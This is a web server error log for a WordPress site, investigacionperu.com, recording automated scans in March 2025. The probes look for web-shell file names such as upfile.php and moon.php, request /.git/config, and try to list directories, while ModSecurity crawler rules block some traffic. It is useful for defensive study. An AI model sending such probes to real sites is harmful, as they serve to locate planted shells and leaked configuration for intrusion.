http://investigacionperu.com/wp-includes/fonts/index.php [Wed Mar 26 02:01:35.966523 2025] [autoindex:error] [pid 31174:tid 140041670080256] [client 194.61.40.64:36746] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 26 02:01:45.994005 2025] [autoindex:error] [pid 30560:tid 140041791649536] [client 194.61.40.64:36772] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Wed Mar 26 02:02:02.053196 2025] [:error] [pid 30560:tid 140041825220352] [client 194.61.40.64:36806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Mar 26 02:02:03.414151 2025] [autoindex:error] [pid 30561:tid 140041594545920] [client 194.61.40.64:36810] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Wed Mar 26 02:02:23.403820 2025] [:error] [pid 30560:tid 140041808434944] [client 194.61.40.64:36846] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Mar 26 02:02:41.961491 2025] [:error] [pid 30560:tid 140041611331328] [client 194.61.40.64:36882] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Wed Mar 26 02:02:59.224927 2025] [autoindex:error] [pid 31174:tid 140041791649536] [client 194.61.40.64:36920] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Wed Mar 26 02:03:40.582038 2025] [:error] [pid 30560:tid 140041636509440] [client 194.61.40.64:36998] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/03/26 03:26:15 [error] 12883#12883: *451416 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/26 03:26:15 [error] 12882#12882: *451417 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Mar 26 09:10:38.365385 2025] [authz_core:error] [pid 13018:tid 140017569605376] [client 164.90.228.79:43834] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/26 09:10:44 [error] 12883#12883: *454796 access forbidden by rule, client: 164.90.228.79, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/26 13:34:42 [error] 12882#12882: *457814 access forbidden by rule, client: 45.148.10.98, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/26 13:40:39 [error] 12883#12883: *457858 access forbidden by rule, client: 45.148.10.98, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/26 14:31:46 [error] 12882#12882: *460423 access forbidden by rule, client: 45.148.10.98, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/26 14:34:56 [error] 12882#12882: *460443 access forbidden by rule, client: 45.148.10.98, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/26 16:03:52 [error] 12882#12882: *461213 access forbidden by rule, client: 45.148.10.98, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/26 19:14:53 [error] 12882#12882: *464685 access forbidden by rule, client: 45.135.193.65, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Mar 27 00:35:42.345786 2025] [autoindex:error] [pid 13581:tid 140017603176192] [client 20.192.14.20:44088] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 27 02:57:29.321169 2025] [autoindex:error] [pid 13016:tid 140017536034560] [client 13.201.5.151:46588] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 02:57:35.125013 2025] [autoindex:error] [pid 13581:tid 140017477285632] [client 13.201.5.151:46592] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 02:57:41.085594 2025] [autoindex:error] [pid 13581:tid 140017494071040] [client 13.201.5.151:46600] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 02:57:43.155490 2025] [autoindex:error] [pid 13016:tid 140017485678336] [client 13.201.5.151:46604] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 02:57:49.738237 2025] [autoindex:error] [pid 13016:tid 140017552819968] [client 13.201.5.151:46610] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 02:57:51.827271 2025] [autoindex:error] [pid 13016:tid 140017468892928] [client 13.201.5.151:46614] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 07:23:47.755759 2025] [:error] [pid 32547:tid 139902947665664] [client 185.223.152.88:50712] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Thu Mar 27 07:23:47.755857 2025] [:error] [pid 32547:tid 139902947665664] [client 185.223.152.88:50712] Stack trace: [Thu Mar 27 07:23:47.755879 2025] [:error] [pid 32547:tid 139902947665664] [client 185.223.152.88:50712] #0 {main} [Thu Mar 27 07:23:47.755968 2025] [:error] [pid 32547:tid 139902947665664] [client 185.223.152.88:50712] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Thu Mar 27 07:24:00.417822 2025] [autoindex:error] [pid 658:tid 139902922487552] [client 185.223.152.88:50754] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Thu Mar 27 07:24:06.300018 2025] [autoindex:error] [pid 32549:tid 139902905702144] [client 185.223.152.88:50768] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Thu Mar 27 07:24:19.270793 2025] [autoindex:error] [pid 658:tid 139902964451072] [client 185.223.152.88:50798] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Mar 27 07:24:24.419406 2025] [autoindex:error] [pid 32547:tid 139902846953216] [client 185.223.152.88:50810] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 07:24:25.609629 2025] [autoindex:error] [pid 658:tid 139902855345920] [client 185.223.152.88:50814] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Thu Mar 27 07:24:38.519308 2025] [autoindex:error] [pid 32547:tid 139902872131328] [client 185.223.152.88:50846] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Thu Mar 27 07:24:38.777461 2025] [:error] [pid 32547:tid 139902821775104] [client 185.223.152.88:50848] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Mar 27 07:24:41.047070 2025] [autoindex:error] [pid 658:tid 139902947665664] [client 185.223.152.88:50854] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Mar 27 07:24:43.302311 2025] [autoindex:error] [pid 32547:tid 139902956058368] [client 185.223.152.88:50860] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Thu Mar 27 07:24:57.271601 2025] [autoindex:error] [pid 32546:tid 139902863738624] [client 185.223.152.88:50892] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Thu Mar 27 07:25:04.738782 2025] [autoindex:error] [pid 32546:tid 139902813382400] [client 185.223.152.88:50906] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Thu Mar 27 07:25:08.503267 2025] [autoindex:error] [pid 32546:tid 139902855345920] [client 185.223.152.88:50914] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Thu Mar 27 07:25:12.916502 2025] [autoindex:error] [pid 32546:tid 139902930880256] [client 185.223.152.88:50924] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Thu Mar 27 07:25:14.182753 2025] [autoindex:error] [pid 32549:tid 139902855345920] [client 185.223.152.88:50928] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Thu Mar 27 07:25:16.573183 2025] [:error] [pid 658:tid 139902981236480] [client 185.223.152.88:50936] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Mar 27 07:25:35.025873 2025] [autoindex:error] [pid 32546:tid 139902989629184] [client 185.223.152.88:50976] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Thu Mar 27 07:25:40.478037 2025] [autoindex:error] [pid 32549:tid 139902947665664] [client 185.223.152.88:50988] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Thu Mar 27 07:25:53.884481 2025] [autoindex:error] [pid 658:tid 139902930880256] [client 185.223.152.88:51022] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Mar 27 07:26:03.699448 2025] [autoindex:error] [pid 658:tid 139902972843776] [client 185.223.152.88:51046] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Thu Mar 27 07:26:18.160037 2025] [:error] [pid 32547:tid 139902989629184] [client 185.223.152.88:51074] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Mar 27 07:26:19.366909 2025] [autoindex:error] [pid 658:tid 139902813382400] [client 185.223.152.88:51078] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Thu Mar 27 07:26:35.649134 2025] [:error] [pid 32549:tid 139902863738624] [client 185.223.152.88:51112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Mar 27 07:26:53.721272 2025] [:error] [pid 658:tid 139902821775104] [client 185.223.152.88:51152] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Thu Mar 27 07:27:09.637168 2025] [autoindex:error] [pid 32546:tid 139902939272960] [client 185.223.152.88:51184] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Mar 27 07:27:48.532486 2025] [:error] [pid 658:tid 139902956058368] [client 185.223.152.88:51264] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Mar 27 16:33:18.571395 2025] [:error] [pid 658:tid 139902846953216] [client 84.239.37.11:60666] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEHr5Qf0_71MgEiowt_AAAANE"] [Thu Mar 27 16:33:18.614511 2025] [:error] [pid 32546:tid 139902855345920] [client 84.239.37.11:60668] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XEHqKrf8nziKHLDs9aQgAAABA"] [Thu Mar 27 16:33:21.811282 2025] [:error] [pid 658:tid 139902939272960] [client 84.239.37.11:60670] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEIb5Qf0_71MgEiowt_QAAAMY"] [Thu Mar 27 16:33:21.842862 2025] [:error] [pid 32547:tid 139902956058368] [client 84.239.37.11:60672] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XEIVXmiWSDeB1Mp1xmEgAAAEQ"] [Thu Mar 27 16:33:22.186986 2025] [:error] [pid 32547:tid 139902939272960] [client 84.239.37.11:60674] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEIlXmiWSDeB1Mp1xmEwAAAEY"] [Thu Mar 27 16:33:23.238187 2025] [:error] [pid 32549:tid 139902930880256] [client 84.239.37.11:60680] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "Z-XEI1VC5Z1Rnn_Iw013SQAAAIc"] [Thu Mar 27 16:33:26.468669 2025] [:error] [pid 32549:tid 139902947665664] [client 185.220.101.20:60684] [client 185.220.101.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEJlVC5Z1Rnn_Iw013SgAAAIU"] [Thu Mar 27 16:33:29.939568 2025] [:error] [pid 32549:tid 139902964451072] [client 84.239.37.11:60686] [client 84.239.37.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "Z-XEKVVC5Z1Rnn_Iw013SwAAAIM"] [Thu Mar 27 16:33:29.963046 2025] [:error] [pid 32549:tid 139902956058368] [client 